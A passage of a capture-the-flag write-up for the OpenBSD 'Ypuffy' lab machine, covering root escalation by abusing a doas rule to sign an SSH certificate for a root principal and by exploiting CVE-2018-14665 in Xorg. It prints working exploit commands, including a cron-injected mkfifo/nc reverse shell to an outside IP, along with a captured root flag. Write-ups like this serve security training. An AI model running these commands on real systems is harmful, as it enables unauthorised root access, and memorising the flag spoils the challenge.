</pre></td> --><td class="rouge-code"><pre>ypuffy<span class="nv">$ </span>doas <span class="nt">-L</span>
ypuffy<span class="err">$</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Let‚Äôs check the config file for doas:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>ypuffy<span class="nv">$ </span><span class="nb">cat</span> /etc/doas.conf
permit keepenv :wheel
permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen
</pre></td></tr></tbody></table></code></pre></div></div>

<p>So, it gives nopass ssh-keygen execution as userca for alice1978.</p>

<h2 id="getting-ca-principal-for-root">Getting CA principal for root</h2>
<p>Let‚Äôs check SSH config files:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td> --><td class="rouge-code"><pre>ypuffy<span class="nv">$ </span><span class="nb">cat</span> /etc/ssh/sshd_config | <span class="nb">grep</span> <span class="nt">-v</span> <span class="s1">'#'</span>

PermitRootLogin prohibit-password
AuthorizedKeysFile      .ssh/authorized_keys
AuthorizedKeysCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type<span class="o">=</span>keys&amp;username<span class="o">=</span>%u
AuthorizedKeysCommandUser nobody
TrustedUserCAKeys /home/userca/ca.pub
AuthorizedPrincipalsCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type<span class="o">=</span>principals&amp;username<span class="o">=</span>%u
AuthorizedPrincipalsCommandUser nobody
PasswordAuthentication no
ChallengeResponseAuthentication no
AllowAgentForwarding no
AllowTcpForwarding no
X11Forwarding no
Subsystem       sftp    /usr/libexec/sftp-server
</pre></td></tr></tbody></table></code></pre></div></div>

<p>There are 2 curl commands that are interesting, let‚Äôs use them.</p>

<p>This is integrated with the postgresql server running. With <code class="language-plaintext highlighter-rouge">type=keys</code>, I can list my SSH-public key.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td> --><td class="rouge-code"><pre>ypuffy<span class="nv">$ </span>curl <span class="s1">'http://127.0.0.1/sshauth?type=keys&amp;username=alice1978'</span>
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEApV4X7z0KBv3TwDxpvcNsdQn4qmbXYPDtxcGz1am2V3wNRkKR+gRb3FIPp+J4rCOS/S5skFPrGJLLFLeExz7Afvg6m2dOrSn02quxBoLMq0VSFK5A0Ep5Hm8WZxy5wteK3RDx0HKO/aCvsaYPJa2zvxdtp1JGPbN5zBAjh7U8op4/lIskHqr7DHtYeFpjZOM9duqlVxV7XchzW9XZe/7xTRrbthCvNcSC/SxaiA2jBW6n3dMsqpB8kq+b7RVnVXGbBK5p4n44JD2yJZgeDk+1JClS7ZUlbI5+6KWxivAMf2AqY5e1adjpOfo6TwmB0Cyx0rIYMvsog3HnqyHcVR/Ufw<span class="o">==</span> rsa-key-20180716
ypuffy<span class="nv">$ </span>curl <span class="s1">'http://127.0.0.1/sshauth?type=keys&amp;username=bob8791'</span>
ypuffy<span class="nv">$ </span>curl <span class="s1">'http://127.0.0.1/sshauth?type=keys&amp;username=root'</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>With <code class="language-plaintext highlighter-rouge">type=principals</code>, I can get the principal for root: <code class="language-plaintext highlighter-rouge">3m3rgencyB4ckd00r</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td> --><td class="rouge-code"><pre>ypuffy<span class="nv">$ </span>curl <span class="s1">'http://127.0.0.1/sshauth?type=principals&amp;username=root'</span>
3m3rgencyB4ckd00r
ypuffy<span class="nv">$ </span>curl <span class="s1">'http://127.0.0.1/sshauth?type=principals&amp;username=alice1978'</span>
alice1978
ypuffy<span class="nv">$ </span>curl <span class="s1">'http://127.0.0.1/sshauth?type=principals&amp;username=bob8791'</span>
bob8791
</pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="doas-for-ssh-with-ca">doas for SSH with CA</h2>
<p>So, I‚Äôll generate SSH keys for root as user <code class="language-plaintext highlighter-rouge">userca</code>, who manages all the SSH-CA authenticated keys.
If I generate a SSH-key pair and set the public key for root with that pair, I can easily get root as I‚Äôve the private key.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>doas <span class="nt">-u</span> userca /usr/bin/ssh-keygen
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Above command needs some extra flags for CA authentication.</p>
<blockquote>
  <p>If I google ‚Äú<em>ssh ca authentication</em>‚Äù:
<a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/deployment_guide/sec-creating_ssh_ca_certificate_signing-keys">access.redhat.com/documentation/‚Ä¶‚Ä¶./creating_ssh_ca_certificate_signing-keys</a>
I get - <code class="language-plaintext highlighter-rouge">ssh-keygen -s ca_host_key -I certificate_ID -h ssh_host_rsa_key.pub</code></p>
</blockquote>

<p>or</p>

<p>I do <code class="language-plaintext highlighter-rouge">ssh-keygen --help</code>:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>ssh-keygen <span class="nt">-I</span> certificate_identity <span class="nt">-s</span> ca_key <span class="o">[</span><span class="nt">-hU</span><span class="o">]</span> <span class="o">[</span><span class="nt">-D</span> pkcs11_provider]
                  <span class="o">[</span><span class="nt">-n</span> principals] <span class="o">[</span><span class="nt">-O</span> option] <span class="o">[</span><span class="nt">-V</span> validity_interval]
                  <span class="o">[</span><span class="nt">-z</span> serial_number] file ...
</pre></td></tr></tbody></table></code></pre></div></div>

<p>So, this command requires a public file at the end. (Says just file in the help, but the article mentions SSH public key)</p>

<ul>
  <li>Generating a SSH-key pair:
    <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
</pre></td> --><td class="rouge-code"><pre>ypuffy<span class="nv">$ </span>ssh-keygen
Generating public/private rsa key pair.
Enter file <span class="k">in </span>which to save the key <span class="o">(</span>/home/alice1978/.ssh/id_rsa<span class="o">)</span>: /tmp/id_rsa
Enter passphrase <span class="o">(</span>empty <span class="k">for </span>no passphrase<span class="o">)</span>:
Enter same passphrase again:
Your identification has been saved <span class="k">in</span> /tmp/id_rsa.
Your public key has been saved <span class="k">in</span> /tmp/id_rsa.pub.
The key fingerprint is:
SHA256:zHdJX37Q3tKAg9K1J/VipnyESQcxAGf1fKKDxHLzmtM alice1978@ypuffy.hackthebox.htb
The key<span class="s1">'s randomart image is:
+---[RSA 2048]----+
|        ..+oBoo  |
|         = + @ o |
|        o B O % =|
|       o = * % @.|
|        S o O + *|
|         . = o ..|
|          + E    |
|           .     |
|                 |
+----[SHA256]-----+
ypuffy$ ls
id_rsa     id_rsa.pub 
</span></pre></td></tr></tbody></table></code></pre></div>    </div>
  </li>
  <li>Running <code class="language-plaintext highlighter-rouge">doas</code>:
SSH-keygen for CA authentication requires:
<code class="language-plaintext highlighter-rouge">-I</code> - Certificate ID for the user (Can keep anything for now, In a working environment, they could use this to track who was assigned a given cert.)
<code class="language-plaintext highlighter-rouge">-s</code> - Specifies that I want to sign a public key using the given CA private key.
<code class="language-plaintext highlighter-rouge">-n</code> - The principles to be included in the certificate.
<code class="language-plaintext highlighter-rouge">/tmp/id_rsa.pub</code> - The public key that will be associated with the certificate.</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>ypuffy<span class="nv">$ </span>doas <span class="nt">-u</span> userca /usr/bin/ssh-keygen <span class="nt">-I</span> root <span class="nt">-s</span> /home/userca/ca <span class="nt">-n</span> 3m3rgencyB4ckd00r /tmp/id_rsa.pub
Signed user key /tmp/id_rsa-cert.pub: <span class="nb">id</span> <span class="s2">"root"</span> serial 0 <span class="k">for </span>3m3rgencyB4ckd00r valid forever
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Now, you can just login with the <code class="language-plaintext highlighter-rouge">id_rsa</code>, you earlier generated:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td> --><td class="rouge-code"><pre>ypuffy<span class="nv">$ </span>ssh <span class="nt">-i</span> id_rsa root@localhost
OpenBSD 6.3 <span class="o">(</span>GENERIC<span class="o">)</span> <span class="c">#100: Sat Mar 24 14:17:45 MDT 2018</span>

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug<span class="o">(</span>1<span class="o">)</span> utility to report bugs <span class="k">in </span>the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and <span class="k">if </span>a
known fix <span class="k">for </span>it exists, include that as well.

ypuffy# <span class="nb">whoami
</span>root
ypuffy# <span class="nb">cat</span> /root/root.txt
1265f8e0a1984edd9dc1b6c3fcd1757f
</pre></td></tr></tbody></table></code></pre></div></div>
<h1 id="privesc-via-xorg-x11-server">Privesc via Xorg-x11-server</h1>
<p>You can get this by simply finding exploits for OpenBSD 6.3.</p>
<blockquote>
  <p>Google ‚Äúopenbsd 6.3 privilege escalation‚Äù
<a href="https://www.exploit-db.com/exploits/45742">https://www.exploit-db.com/exploits/45742</a></p>
</blockquote>

<p>or</p>

<p>If I check for SUID‚Äôs present on ypuffy, I‚Äôll see Xorg-x11:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
</pre></td> --><td class="rouge-code"><pre>ypuffy<span class="nv">$ </span>find / <span class="nt">-type</span> f <span class="nt">-perm</span> <span class="nt">-4000</span> 2&gt;/dev/null
/usr/bin/chfn
/usr/bin/chpass
/usr/bin/chsh
/usr/bin/doas
/usr/bin/lpr
/usr/bin/lprm
/usr/bin/passwd
/usr/bin/su
/usr/libexec/lockspool
/usr/libexec/ssh-keysign
/usr/local/bin/pwned
/usr/local/libexec/dbus-daemon-launch-helper
/usr/sbin/authpf
/usr/sbin/authpf-noip
/usr/sbin/pppd
/usr/sbin/traceroute
/usr/sbin/traceroute6
/usr/X11R6/bin/Xorg
/sbin/ping
/sbin/ping6
/sbin/shutdown
</pre></td></tr></tbody></table></code></pre></div></div>

<p>The xorg-x11-server package on the system suffers from a root privilege escalation vulnerability
(CVE-2018-14665).</p>

<p>Also there are 2 exploits in exploit-db for a single CVE. Named <code class="language-plaintext highlighter-rouge">xorg-x11-server &lt; 1.20.3 - Local Privilege Escalation</code> and <code class="language-plaintext highlighter-rouge">xorg-x11-server 1.20.3 - Privilege Escalation</code>.</p>

<p>If I check my <code class="language-plaintext highlighter-rouge">Xorg</code> version, it‚Äôs <code class="language-plaintext highlighter-rouge">1.19.6</code> &lt; 1.20.3.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td> --><td class="rouge-code"><pre>ypuffy<span class="nv">$ </span>Xorg <span class="nt">-version</span>

X.Org X Server 1.19.6
Release Date: 2017-12-20
X Protocol Version 11, Revision 0
Build Operating System: OpenBSD 6.3 amd64
Current Operating System: OpenBSD ypuffy.hackthebox.htb 6.3 GENERIC#100 amd64
Build Date: 24 March 2018  02:38:24PM

Current version of pixman: 0.34.0
        Before reporting problems, check http://wiki.x.org
        to make sure that you have the latest version.
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Using <a href="https://www.exploit-db.com/exploits/45697">https://www.exploit-db.com/exploits/45697</a>:</p>

<p>The exploit tries to overwrite data in <code class="language-plaintext highlighter-rouge">master.passwd</code> and change the password to <code class="language-plaintext highlighter-rouge">Password1</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre>Xorg <span class="nt">-fp</span> <span class="s1">'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &amp;:/root:/bin/ksh'</span> <span class="nt">-logfile</span> master.passwd :1 &amp;
</pre></td></tr></tbody></table></code></pre></div></div>

<p>I‚Äôll overwrite /etc/crontab and get a shell.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span><span class="nb">cd</span> /etc
<span class="nv">$ </span>Xorg <span class="nt">-fp</span> <span class="s2">"* * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.14.26 4444 &gt; /tmp/f"</span> <span class="nt">-logfile</span> crontab :1 &amp;
<span class="nv">$ </span><span class="nb">cat</span> /etc/crontab
<span class="o">[</span>   668.598] <span class="o">(==)</span> Automatically adding devices
<span class="o">[</span>   668.598] <span class="o">(==)</span> Automatically enabling devices
<span class="o">[</span>   668.598] <span class="o">(==)</span> Not automatically adding GPU devices
<span class="o">[</span>   668.598] <span class="o">(==)</span> Max clients allowed: 256, resource mask: 0x1fffff
<span class="o">[</span>   668.598] <span class="o">(</span>++<span class="o">)</span> FontPath <span class="nb">set </span>to:
        <span class="k">*</span> <span class="k">*</span> <span class="k">*</span> <span class="k">*</span> <span class="k">*</span> root <span class="nb">rm</span> /tmp/f<span class="p">;</span><span class="nb">mkfifo</span> /tmp/f<span class="p">;</span><span class="nb">cat</span> /tmp/f|/bin/sh <span class="nt">-i</span> 2&gt;&amp;1|nc 10.10.14.26 4444 <span class="o">&gt;</span> /tmp/f
<span class="o">[</span>   668.598] <span class="o">(==)</span> ModulePath <span class="nb">set </span>to <span class="s2">"/usr/X11R6/lib/modules"</span>
<span class="o">[</span>   668.598] <span class="o">(</span>II<span class="o">)</span> The server relies on wscons to provide the list of input devices.
        If no devices become available, reconfigure wscons or disable AutoAddDevices.
</pre></td></tr></tbody></table></code></pre></div></div>

<p>I get a rev-shell back as root.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>nc <span class="nt">-lnvp</span> 4444
listening on <span class="o">[</span>any] 4444 ...
connect to <span class="o">[</span>10.10.14.26] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.107] 24626
/bin/sh: No controlling <span class="nb">tty</span> <span class="o">(</span>open /dev/tty: Device not configured<span class="o">)</span>
/bin/sh: Can<span class="s1">'t find tty file descriptor
/bin/sh: warning: won'</span>t have full job control
ypuffy# <span class="nb">whoami
</span>root
</pre></td></tr></tbody></table></code></pre></div></div>
:ET